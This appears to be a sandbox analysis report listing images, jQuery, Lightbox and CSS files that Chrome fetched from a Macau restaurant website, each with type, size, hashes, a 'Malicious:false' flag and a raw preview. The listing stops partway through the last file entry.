                                                                                                                                                              SSDEEP:1536:2jowEjowPEms+qbVbHsPt7Kev7u3WSLQ1SqqUxyBOhlZLuCp4DbqzHRE:2gxwj0Ks7NSLQUqjyghvL/4D2jRE
                                                                                                                                                              MD5:38547BC6C74397CC593FDACA8C5790A5
                                                                                                                                                              SHA1:30333135FC0235EE4752031E8B746A87F01A767D
                                                                                                                                                              SHA-256:CB4F5104FF213DA882C58D211601DFB33C0D8A98395213A10BE6C45144566285
                                                                                                                                                              SHA-512:147116AC8D3FC53E1853737F967B91183F65398498D9113A88226E20A42687BA6A15389896A6950D006A433806E0CEF6605502C20121620034283026560E9F60
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:...."dExif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 11:33:51.............0221...................................^...............................n...........v.(.....................~.......... ........H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):43
                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2767
                                                                                                                                                              Entropy (8bit):5.944417587054994
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:3qUsI8Xiz5Sy27zLqltAFUr5UqkK9u9nwuacq5UhD7BO1/IkoozgNe:3qUsTXc5SyePqltAFUr5Uqt9u9nwPtmI
                                                                                                                                                              MD5:7E99E1159A3686F6AA4F90043C554483
                                                                                                                                                              SHA1:BD54DB91B81FA8A9EC37C93B10948DD8B690E4C4
                                                                                                                                                              SHA-256:81EA81BE1D862D36C34B6DC4F12AEFB87B656E319003263D8274974B48CCF869
                                                                                                                                                              SHA-512:AEF471830517267A4B5D4B9E7145B5B670ED8C068B61C806D67A6B386A274AA2BD991142F8A1E2896CB0BBF6C5024FA9DF224C0F2605581593D34B750273A6ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:GIF89a . ..........................444..............TTT...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,.... . ........H......*\.p......h.p........."......8.....G>D).....R.4.C.....I....\..9p.....:.s...1_2`.p`...u.<.u...SY...k.`.F.hv..6S>u..+..ry..J./Q..M.0@.p_...+.+....../.KY&]......9..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2020:06:18 13:00:09], baseline, precision 8, 318x350, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):170351
                                                                                                                                                              Entropy (8bit):7.925817846328311
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:klRMzlRMGpyC13tAKHQyWqywo5lJm/A1Pq3cZZTI+GxSSZP510B1wh77Pr4:z19t7lyzZ+crI3R6B1w17Ps
                                                                                                                                                              MD5:3A41C10A587492478C97E6E5F1441C39
                                                                                                                                                              SHA1:DEF47AE2C39113C2A9CA59A83277CEF23CA2BBF1
                                                                                                                                                              SHA-256:9DEADD691D67EC2A20B54F7DA4E1E2FECD486D91CC57A41ABFAEAB2C992CEF0C
                                                                                                                                                              SHA-512:5A3C2CF264433BF700E21E61CDBD3B8DBD5FC1D39575FC29451992E65B1E7B614A3E723C4334EED987FBF7E47586E3E9E792A335A65520F2802EFE05DEF5F94D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/indexpic06.jpg
                                                                                                                                                              Preview:....19Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2020:06:18 13:00:09..........................>...........^...........................................&.(................................0........H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 970x43, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):894
                                                                                                                                                              Entropy (8bit):2.2993635994559245
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8T0WkmMtklelcmdWmsycyP5Qe:V/XPYhiPRd8nUoUcyCe
                                                                                                                                                              MD5:127FEDF0638CE62C681C002CABEA5C5F
                                                                                                                                                              SHA1:6DEF550829CD0E608A67A88B927DD207D92E5E16
                                                                                                                                                              SHA-256:2EA18201CAC1CC9B163B55308470A72942CC858E1D63A9F1C0908EEDAC40528A
                                                                                                                                                              SHA-512:E21DD0FC1AFCFD7914EDEFE49AF7BA3AEE54C2302C0062282D8C9DC466FC7FE1E1D7E450DBAC4DA1861DEEA1422293A8071D6C82B71E19E0DDA9EED4CBAB497A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................+...............X..............................................................1AQ!................................?..Nob..'JG\...........................................................................................Lyo.u.........]...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):20701
                                                                                                                                                              Entropy (8bit):5.26060468835284
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:GMEzJTYIDzb3kOWqwM1TY9/IKFTUQzakGpw:GMWTYIXJQoTY9/ImDjGO
                                                                                                                                                              MD5:98306AE292539289188CF3B937CD1763
                                                                                                                                                              SHA1:4EEA11C9A2C02DAEB3317DE8503A7CC30854E831
                                                                                                                                                              SHA-256:F9ECCF2E03180B559FD1F7D645384840CC12AE097AEAB94E7BB056C4F2AA003A
                                                                                                                                                              SHA-512:301005D3E02B254C6B6687F3B25BDBCCB31344BE2439DFCFB3F4E8604C3E77C4462F9B09A73E9A5F522EBC679F8496037D902A2884728A2E7B1666A84304D032
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/js/lightbox.js
                                                                                                                                                              Preview:// -----------------------------------------------------------------------------------..//..//.Lightbox v2.02..//.by Lokesh Dhakar - http://www.huddletogether.com..//.3/31/06..//..//.For more information on this script, visit:..//.http://huddletogether.com/projects/lightbox2/..//..//.Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/..//...//.Credit also due to those who have helped, inspired, and made their code available to the public...//.Including: Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.org), Thomas Fuchs(mir.aculo.us), and others...//..//..// -----------------------------------------------------------------------------------../*.....Table of Contents...-----------------...Configuration...Global Variables.....Extending Built-in Objects....- Object.extend(Element)...- Array.prototype.removeDuplicates()...- Array.prototype.empty().....Lightbox Class Declaration...- initialize()...- start()...- changeImage()...- resi
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):12274
                                                                                                                                                              Entropy (8bit):5.142138538204755
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:rYxymiqWoop30agTfbuhu8s9x/Ghg8/JPCKR9f0jrqqj39JzJg7SiO4:rChop30b/WJPUjPjNJzJWSi
                                                                                                                                                              MD5:2756159D63FF113603F46B61ECCDFAE5
                                                                                                                                                              SHA1:FCB8F85D7447838B2CAC4E3E8C27790D99B1C436
                                                                                                                                                              SHA-256:39B597871BCE552B8F775CF3F5EF6FB7D8F2D5F92CAD0C678B5D7EC009492A27
                                                                                                                                                              SHA-512:9D68C667ADD0E8D38EED60A7E8BB9875A154DA93D7FE3A4438441B67069AAABE6502BA57EC6852C175BCF34239D4D65D53D20DDE7E096941A8C25F0E278DE7FB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/css/index_smpc.css
                                                                                                                                                              Preview:body{.. background:#f7f7f7;..}..../*---------------- ... banner ---------------*/..body{.. background:#F4F4F4;..}...swiper{.. width:100%;.. height:90%;.. margin-top:0;.. position:relative;..}...swaper-imgs{.. width:100%;.. height:100%;.. background:rgba(1,1,1,1);.. position:absolute;.. left:0;.. top:0;.. z-index:0;..}...swaper-img-show{.. z-index:999;..}...swiper-icon{.. position:absolute;.. top:50%;.. z-index:99;.. color:#ccc;.. width:42px;.. height:42px;.. font-size:28px;.. line-height:42px;.. border-radius:50%;.. text-align:center;.. background:rgba(22,22,22,0.6);.. cursor:pointer;..}...swiper-left{.. left:20px;.. text-indent:-2px;..}...swiper-right{.. right:20px;.. text-indent:2px;..}...swaper-img{.. display:block;.. width:100%;.. height:100%;.. text-align:center;.. font-size:24px;.. color:#fff;.. position:absolute;.. top:0;.. left:0;.. background-position:center;.. background-size:cover;.. opacity:0;..}...swaper-img-show{.. opacity:
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 100x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2264
                                                                                                                                                              Entropy (8bit):7.7212562551861135
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki8mrYdcsSa2ArT1btLFjMj+p0shLYC9k0tQcrX0MJ9aHM5OaCG3kvn/nson:+mrYd2aZRFTHcoBoMJ975Oaz0P/son
                                                                                                                                                              MD5:8FBCA91A2539EE378A5D1E2C21C413FC
                                                                                                                                                              SHA1:0A21083E64D8C9709F84F4D965344CBCE6B4B837
                                                                                                                                                              SHA-256:CB731B4D238B1EC7F708E3BD32787468C7767A3B88D23DB8C25DAC32C1D6BF27
                                                                                                                                                              SHA-512:97452D476732265CC30AC0D7F74D9E6420096F5663E2ABA6037CD866AC7BF5D59A7FDC147C21E902D9A0207BB165A7172F07875FD5B7A91A4EEC2EB692253AFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu03b.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................d..........................................................................................!".1A...Bba2#3$4........................!.1A.Qaq"2..BR.....3............?....f..o.o.o.o... .c....a......+Q.#Q.k..E.T..0."....u........im....R..R...d..sb...!.C8.78Ej8dj9..sV......&..@u ...4:..y..#.-.Y.Q.JQ.JWP.d..gYE......l.......qT.....+...{**...S...q..PQCsEi...1..r.F=...J..@_...+..R$.%e......q..'3....Rq....u7S]M.....}.%.on......1..<.......]....a.....p."S.p.bcfh..jE.=.{QF.......F,.Q...q..K......\`.{......]..... .$K.Q..p..R4b..i..U._...R......K.f.L.#.[.....7.%......i-...8.......Gb.J."..*._..U./D.w...>.v.\,W...>R.F.x1n7.Oa.s1V*8V.&.c...H.2.__.....+h.px.GocW...-;..}.Ce..Cx.6.....m.2.....5wUc....~....b.....#.A......c.`.Dq.2..#Q.G...z'Mx...j.p.\....\..K..[i,>.p..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (32012), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):36651
                                                                                                                                                              Entropy (8bit):5.4988553768279145
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:3fLPEkLvPdMiADIOr/NEe87S5nmBubTHv/d38zj9H9MeuIso:DPEkjP+iADIOr/NEe876nmBu3HvF38Nx
                                                                                                                                                              MD5:CAF0ED407D48BF92A0758159ACDC1BFF
                                                                                                                                                              SHA1:B9020B80423D516E54908E484404A50F729F8DFD
                                                                                                                                                              SHA-256:EE78847BA7BC28CB48DFE54DFE7C0EADEBF5326CBD4C539F2A577F01C89452B6
                                                                                                                                                              SHA-512:DA8AE6C6A08ADE29C185A4E1B1017CAF74C27C7C31D0F608C91DAB07DDA2838FB55B951571A0E2895FF188B648E1E1A15B13A50FB10FAC753999E57A55D197DD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/js/jquery.min.js
                                                                                                                                                              Preview:/*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 360x43, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7862
                                                                                                                                                              Entropy (8bit):7.942124420352337
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Ex+W9WvObWK8G4nxqpavMNd2GD1RRrxrxeUyj:Ex+DtRAEvM3JRNxdyj
                                                                                                                                                              MD5:8C3D1BF93E52486F20B27A0B59D80A96
                                                                                                                                                              SHA1:A398248435F8161D6091D2CE9FBCE865A252CC75
                                                                                                                                                              SHA-256:0950F80B83135C315F35C64F8DDD86F37E15F59A606F0390D47CF7D9ED86E3CF
                                                                                                                                                              SHA-512:1DCED3B88C1442931A1700B537441F456E900F872BDB2362E9E6296968D040AC6BDD92F2ACEF89BD54600AE51C932D3E61CC16575CB2472B666E79FB30B1D055
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................+.h............................................................................................!.1..AQq"2.a.....R.B.#.br..S.DT.U.......................!1..AQ..aq."..2B..R#......br...$............?..q.Z..)i.~g.C_...W.G..\>.H...w.*u..7..T;.~Q.?...I...|.%. .uS..s...)#...T...:y......|...I....5...#...s.?..~I...Ey's\...(...w...~I.....z..........?yQ......7......j..s..T.W..uo..OOt.?#.....MG...nM.\*[.3..Pn...^.5....7F...q...U5.......?.S..7..:.?Q.(.rk*.......Pj......>...>O..N...u......,u.r<J:......5.h.ZO.o3.....I...t.y.=i?....4G.'....Q.Q2.2....H......u .'......S.3....w.s...7...A..R.Wb.q^._R.....5../R.QJ..........:...>.z..y.E..:...........yMe*.%.v..{.......~Ju...W..T......\n.?..?$......o...m\n.....K...<a.o....W..~Q.?.uJYsj..Q.~...uq.....S.)u...].[.!..:.7.q.....|..Fv.ne..(
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 72x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1595
                                                                                                                                                              Entropy (8bit):7.581441385414006
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki8g1xdbBQflwTmGnJd1lljewqUxJhFNsHe1B:+g1xhBQflwTx1llLfLEw
                                                                                                                                                              MD5:43B2811EE95946AE8C1585753DF71E05
                                                                                                                                                              SHA1:FB547E0592494C40C38CCD8966CB36907184F952
                                                                                                                                                              SHA-256:50F49BF6B401B32FB338F5F9C4A7816F04B1D297507598E16063707BDC0CD762
                                                                                                                                                              SHA-512:A7B98F8208C257C18F29DD8CA986F213E4C85DDFC658B1724851B83637BEA4BAC63DA81DE269A6723F6627F22FF7DC3536CA59CE4C3FC1AC15054C97B052ADFC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................H........................................................................................!A"...1qB.Qa.2R........................!.1AQ.a"B....2Rq.r..C............?..{...|.w...).S...~)N.R...;.J..-4....'..6..,.l...J..B7...Q..._..ey.;...c......32.Y.D..(...H.,..m.j....k...m[9....].....0.t...,r...9U..b"y.....,....}..P...&}".9.....Z...jz.;clg..=~.}tM.0#....Oy.(L..G.Z.._...[..m......s.^B. .n.[]x|..]8.A...cw......L..icE...5....Q..+.E+..F..h.[......~.e..cd,.(i..... ~K>c.Eu.UH.j....&.o!..UwM...d...8.0......".{...........'...".>gC7..q..?.E..p..z..>...=...:.P..l.Vl...A.|9....GW..EE.Oq.N..d&....m..f\..J..... O/5......]x.q.-K6k..A5tH..%.c..{..U...#......^|..1..A.J.b .y......:..$\b....^gtV.l..|?g.#.~.|.Nz.#.3O...a?J........Y.>......b......b..6....}..R0..W.\x............=.c\
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 45x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):529
                                                                                                                                                              Entropy (8bit):5.919148557660297
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd8jbWvEglqeBrkEmfgjiWgHW1i/+Jh8n:dkiPojbaOgr/jidd/2h8
                                                                                                                                                              MD5:9CC6F13E6E398068F361A2F2F4623790
                                                                                                                                                              SHA1:77A6B29C896C1D924C59E0634F045B539AA36D3F
                                                                                                                                                              SHA-256:574F7EF63596A00D206B215C01E32191E590033EB3B0EA043678790C67ED6FF7
                                                                                                                                                              SHA-512:48FB2BC7FFABAD44D9EB0429E0A048C6BD155039483FCAAD10555F65FF05D605B1D8666121ED149DC90BC7AB35C7635F1F1CE31BEB8AB2632428B99F2D493A4D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu_rightPic.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................-...................................................................................!."...qb..AQ..D.'.......................!.....1A"Bb...#..%............?..>Yp..x..x....#...........,......+..j.hUz..(i+....e....K..*.d..<.4..}.\*.uaV>...(...1.....4].s...sgzgv..a...\1.h.r30..b.S.4...z...i..o.......z.........7y...t....-...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):268039
                                                                                                                                                              Entropy (8bit):5.068500671791412
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:vtah6/a+TCtrnTz+vbaKYmDezK8iB7aVFyAGPL/1bK15IPfMYAAI1vrnD:imaKYmDQcKFyP2cPfJAAIBrD
                                                                                                                                                              MD5:09DD64A64BA840C31A812A3CA25EAEEE
                                                                                                                                                              SHA1:FD81582BF1B15E6747472DF880CA822C362A97D1
                                                                                                                                                              SHA-256:0D9027289FFA5D9F6C8B4E0782BB31BBFF2CEF5EE3708CCBCB7A22DF9128BB21
                                                                                                                                                              SHA-512:A0BF3890B40C10F212DF9D27644A6F147D70854D071C63540EAFD7DD605D0C0BCA3FB8E7D3A8074EC0ACCA6B283D8285FDDB8DF19C73CEF42039A6994A0718B5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/js/jquery.js
                                                                                                                                                              Preview:/*!. * jQuery JavaScript Library v3.2.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2017-03-20T18:59Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):227297
                                                                                                                                                              Entropy (8bit):7.934561502080002
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:D9OH9OeivboHY6O4xMSjvFsJ6fWpr4wO3yM:Eohjr6OcOJ6c40M
                                                                                                                                                              MD5:E686E563CC54AF2D92DAE207B4AD7E3A
                                                                                                                                                              SHA1:77C80B5697840D451EDCF785C1C71240200495FD
                                                                                                                                                              SHA-256:B250069167C423616BACBF4AD06CD5FE297816C1A3BE5127F1D63D93FC931F93
                                                                                                                                                              SHA-512:43A0482FAB4CB716E203061DE2F4478AE0078C6C16F98D599E060994E4A6A9E738B63CB7CD455023D953C47F21B13C25DB74AA073DBB83B73F3E82C0F38FAC52
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....0\Exif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:11:52.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................,......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 100x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1828
                                                                                                                                                              Entropy (8bit):7.642844311594331
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojb82sepluNBHYe14+zyjm60MOnwvOOWulTK7MJtfAQh4lecfTLrdd:Ki89urXueyn09n6hJtYQh+D
                                                                                                                                                              MD5:EB40F3116D57CE921F48F58B1AF2037E
                                                                                                                                                              SHA1:88CFDF893C93AC118E4298F399A5CE31EA3B0746
                                                                                                                                                              SHA-256:44528BFA51F37F2FA824A8438BCB7AD2B207320CE06516E69EB5684E35CF93DC
                                                                                                                                                              SHA-512:C7674B4FBB0DA3247AADF6C7B1E856470B327CDB46CEE3E04B8B531945E4D122BC944F77AFA1F7553D405000DE7EA4DB9F9A2524025AA7C18BB4EB6ED1D099DA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................d........................................................................................!".1A...aB..q2b#3$4.....................!1.A.Qa.....2..q."b.............?...u.e|..DNtD.DNtE"Lyp.1.h.(.a0.s..#y1.D.\.t_EJ..H...S..9...1..x.21...a..1.W....9..r-.}.(C*1".?:)NtD.D^.....+s..Ag....=....R.N..z...:...^.R$..n....>T...V.....P..I.N..?.<.$....W..#^.....[^.q.p..Ym.=.G}.3...-K...b...Xi.|]|....H..'=..U.".-..5.q.:..... .d#.g6P`.fec......1.N(..oV....|...... .....E..o.Q6....u\<.c..p..&.....x..R..+..W.r*.n..+\.1..e..K.."Z"..........O.r&..$.m .%...T...W.....D..U.....6.Ze.......@...N.l....6Es..0S......PT....\.5...![.d.P1E.j.e...Q.}...V.ouE...8,~&>A.)...!.H.#<-.'.........."[.j.B1...Y.. ...>...u{3J....5...?.c.8.b._...!..(.QU..+.....W.Ix.y@>.})z7.....~.YF...u.7.....i....b..c.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 95x22, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2247
                                                                                                                                                              Entropy (8bit):7.747917425694003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:KiCCfzj/hTYpi1krKKlp+SB0w1ObsdGz0WXFc+ZjK07i:pz9Ta86BlQI3d+5XFhZjK0m
                                                                                                                                                              MD5:ACBEB766BF38ABC0DC51EE7D12A2886F
                                                                                                                                                              SHA1:A3246D885EE2D0BAEA7AF02C6921A397601258D7
                                                                                                                                                              SHA-256:2F7625778619177F8E9C94B8BCB90249B15776E66F5DAC7B66306D8E63DC5E01
                                                                                                                                                              SHA-512:8D691326F7CE053D4FC7EE379C3F0DE5C75A4BA74311D28CEEE85E9AC65E492AADC3CBBF6C2462A111C81EE44AB53721C821FEA52B4EC70A4E0A1A1AA0495015
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/title_products.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d..................................................................................................................................................._..........................................................................................!..1".2#AQB3..$.'.......................!.1"..AQ.2a.q....BR#3....$.............?...E.h...Q..4QF.(.E3.c_U......d.....i%......T....I.Qf.....Tx.......>zB@...KKF.(.E.(.v...y......2,.-C.g....Q.....7N...@h.n?..~....`.....r..:..`!.8...Up.\.sjM!._!..1Wb.V.-..[[y..%.R..Fu.J.y8.......v...|[.nCuz....!H3..4..a.. >3.S..*eqX..mu\.....N......3S....e.x.@l..?....{.\.5B.L*...o.<e.....f....j[.j.H...}.*/...l.O.%.dIP.t$.w..zk...e..fV...Tz.s..ef5.0..4KLS.k..yP....M.j.c.M{s.T.".m4............].f.mN.....[(B....... +.h-..+?....x......C...2[DU...........,'.L.S.. 6..h....Dt'...7@n..,.v.....`.u...Zu...+s..&.k5..W.Xem.K....ulHfEt......S%>...[...M*.m...s.)........^ff.4..b..........>_.x..'@....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):179772
                                                                                                                                                              Entropy (8bit):7.912121017882399
                                                                                                                                                              Encrypted:false
